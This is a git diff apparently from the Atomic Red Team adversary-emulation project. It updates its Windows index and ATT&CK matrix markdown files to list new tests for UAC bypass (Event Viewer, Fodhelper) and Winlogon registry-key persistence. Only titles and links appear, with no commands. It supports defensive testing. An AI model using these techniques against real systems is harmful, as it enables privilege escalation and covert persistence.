| | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](./T1151/T1151.md) | | | | | | | -| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Winlogon Helper DLL](./T1004/T1004.md) | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | [Timestomp](./T1099/T1099.md) | | | | | | | | | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | | | | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 2a216322..f6796ede 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -9,6 +9,9 @@ - [T1009 Binary Padding](./T1009/T1009.md) - [T1088 Bypass User Account Control](./T1088/T1088.md) - Atomic Test #1: Bypass UAC using Event Viewer [windows] + - Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows] + - Atomic Test #3: Bypass UAC using Fodhelper [windows] + - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] - [T1191 CMSTP](./T1191/T1191.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] @@ -140,6 +143,9 @@ - Atomic Test #1: Application Shim Installation [windows] - [T1088 Bypass User Account Control](./T1088/T1088.md) - Atomic Test #1: Bypass UAC using Event Viewer [windows] + - Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows] + - Atomic Test #3: Bypass UAC using Fodhelper [windows] + - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -252,7 +258,10 @@ - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) - Atomic Test #1: Persistence [windows] - Atomic Test #2: Persistence Cleanup [windows] -- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1004 Winlogon Helper DLL](./T1004/T1004.md) + - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] + - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] + - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] # discovery - [T1087 Account Discovery](./T1087/T1087.md) diff --git a/atomics/windows-matrix.md b/atomics/windows-matrix.md index 63cb48ef..e3927fb0 100644 --- a/atomics/windows-matrix.md +++ b/atomics/windows-matrix.md @@ -42,7 +42,7 @@ | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | | | | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvr32](./T1117/T1117.md) | | | | | | | | | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Rootkit](./T1014/T1014.md) | | | | | | | -| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rundll32](./T1085/T1085.md) | | | | | | | +| | | [Winlogon Helper DLL](./T1004/T1004.md) | | [Rundll32](./T1085/T1085.md) | | | | | | | | | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | [Scripting](./T1064/T1064.md) | | | | | | | | | | | | [Signed Binary Proxy Execution](./T1218/T1218.md) | | | | | | |